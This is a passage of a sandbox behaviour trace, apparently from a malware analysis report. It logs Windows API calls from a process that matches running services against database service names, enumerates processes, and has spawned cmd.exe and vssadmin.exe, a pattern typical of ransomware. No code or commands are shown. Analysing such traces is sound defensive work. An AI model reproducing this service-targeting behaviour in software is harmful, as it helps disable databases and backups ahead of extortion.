(lpString="PlugPlay") returned 8 [0311.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0311.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0311.276] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0311.276] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0311.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0311.276] lstrlenW (lpString="Power") returned 5 [0311.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0311.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0311.276] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0311.276] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0311.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0311.276] lstrlenW (lpString="ProfSvc") returned 7 [0311.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0311.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0311.277] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0311.277] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0311.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0311.277] lstrlenW (lpString="RpcEptMapper") returned 12 [0311.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0311.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0311.277] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0311.277] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0311.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0311.277] lstrlenW (lpString="RpcSs") returned 5 [0311.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0311.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0311.277] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0311.277] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0311.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0311.277] lstrlenW (lpString="SamSs") returned 5 [0311.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0311.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0311.277] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0311.277] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0311.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0311.278] lstrlenW (lpString="Schedule") returned 8 [0311.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0311.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0311.278] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0311.278] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0311.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0311.278] lstrlenW (lpString="SecurityHealthService") returned 21 [0311.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0311.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0311.278] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0311.278] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0311.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0311.278] lstrlenW (lpString="SENS") returned 4 [0311.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0311.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0311.278] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0311.278] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0311.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0311.278] lstrlenW (lpString="ShellHWDetection") returned 16 [0311.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0311.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0311.279] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0311.279] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0311.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0311.279] lstrlenW (lpString="Spooler") returned 7 [0311.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0311.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0311.279] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0311.279] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0311.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0311.279] lstrlenW (lpString="StateRepository") returned 15 [0311.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0311.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0311.280] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0311.280] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0311.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0311.280] lstrlenW (lpString="SysMain") returned 7 [0311.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0311.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0311.280] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0311.280] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0311.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0311.280] lstrlenW (lpString="SystemEventsBroker") returned 18 [0311.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0311.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0311.280] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0311.280] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0311.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0311.280] lstrlenW (lpString="Themes") returned 6 [0311.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0311.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0311.281] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0311.281] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0311.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0311.281] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0311.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0311.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0311.281] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0311.281] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0311.282] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4150d60 | out: hHeap=0x470000) returned 1 [0311.282] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x554 [0311.288] Process32FirstW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0311.289] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0311.290] lstrlenW (lpString="System") returned 6 [0311.290] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0311.290] lstrlenW (lpString="smss.exe") returned 8 [0311.290] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0311.291] lstrlenW (lpString="csrss.exe") returned 9 [0311.291] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0311.291] lstrlenW (lpString="wininit.exe") returned 11 [0311.292] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0311.292] lstrlenW (lpString="csrss.exe") returned 9 [0311.292] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0311.293] lstrlenW (lpString="winlogon.exe") returned 12 [0311.293] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0311.294] lstrlenW (lpString="services.exe") returned 12 [0311.294] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0311.294] lstrlenW (lpString="lsass.exe") returned 9 [0311.294] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0311.295] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0311.295] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0311.296] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0311.296] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.296] lstrlenW (lpString="svchost.exe") returned 11 [0311.297] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.297] lstrlenW (lpString="svchost.exe") returned 11 [0311.297] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0311.298] lstrlenW (lpString="dwm.exe") returned 7 [0311.298] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.299] lstrlenW (lpString="svchost.exe") returned 11 [0311.299] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.299] lstrlenW (lpString="svchost.exe") returned 11 [0311.299] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.300] lstrlenW (lpString="svchost.exe") returned 11 [0311.300] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.300] lstrlenW (lpString="svchost.exe") returned 11 [0311.300] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.301] lstrlenW (lpString="svchost.exe") returned 11 [0311.301] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.301] lstrlenW (lpString="svchost.exe") returned 11 [0311.301] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.302] lstrlenW (lpString="svchost.exe") returned 11 [0311.302] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.302] lstrlenW (lpString="svchost.exe") returned 11 [0311.302] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.303] lstrlenW (lpString="svchost.exe") returned 11 [0311.303] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.304] lstrlenW (lpString="svchost.exe") returned 11 [0311.304] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0311.317] lstrlenW (lpString="spoolsv.exe") returned 11 [0311.318] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.318] lstrlenW (lpString="svchost.exe") returned 11 [0311.318] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0311.319] lstrlenW (lpString="audiodg.exe") returned 11 [0311.319] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0311.320] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0311.320] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0311.321] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0311.321] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0311.322] lstrlenW (lpString="Memory Compression") returned 18 [0311.322] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0311.323] lstrlenW (lpString="sihost.exe") returned 10 [0311.323] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.324] lstrlenW (lpString="svchost.exe") returned 11 [0311.324] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0311.324] lstrlenW (lpString="taskhostw.exe") returned 13 [0311.324] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0311.325] lstrlenW (lpString="explorer.exe") returned 12 [0311.325] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0311.326] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0311.326] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0311.327] lstrlenW (lpString="SearchUI.exe") returned 12 [0311.327] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0311.328] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0311.328] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0311.328] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0311.329] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0311.329] lstrlenW (lpString="wdgmug.exe") returned 10 [0311.329] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0311.330] lstrlenW (lpString="cmd.exe") returned 7 [0311.330] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0311.331] lstrlenW (lpString="conhost.exe") returned 11 [0311.331] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0311.332] lstrlenW (lpString="vssadmin.exe") returned 12 [0311.332] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0311.333] CloseHandle (hObject=0x554) returned 1 [0311.333] Sleep (dwMilliseconds=0x1f4) [0311.836] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a300 [0311.837] EnumServicesStatusExW (in: hSCManager=0x401a300, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0311.837] GetLastError () returned 0xea [0311.837] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c30) returned 0x4150d60 [0311.837] EnumServicesStatusExW (in: hSCManager=0x401a300, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4150d60, cbBufSize=0x1c30, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4150d60, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0311.838] CloseServiceHandle (hSCObject=0x401a300) returned 1 [0311.839] lstrlenW (lpString="Appinfo") returned 7 [0311.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0311.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0311.839] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0311.839] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0311.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0311.839] lstrlenW (lpString="AppXSvc") returned 7 [0311.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0311.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0311.839] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0311.839] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0311.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0311.839] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0311.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0311.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0311.839] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0311.839] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0311.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0311.839] lstrlenW (lpString="Audiosrv") returned 8 [0311.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0311.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0311.839] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0311.839] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0311.839] lstrcmpiW (lpString1="sqlserveradhelper", 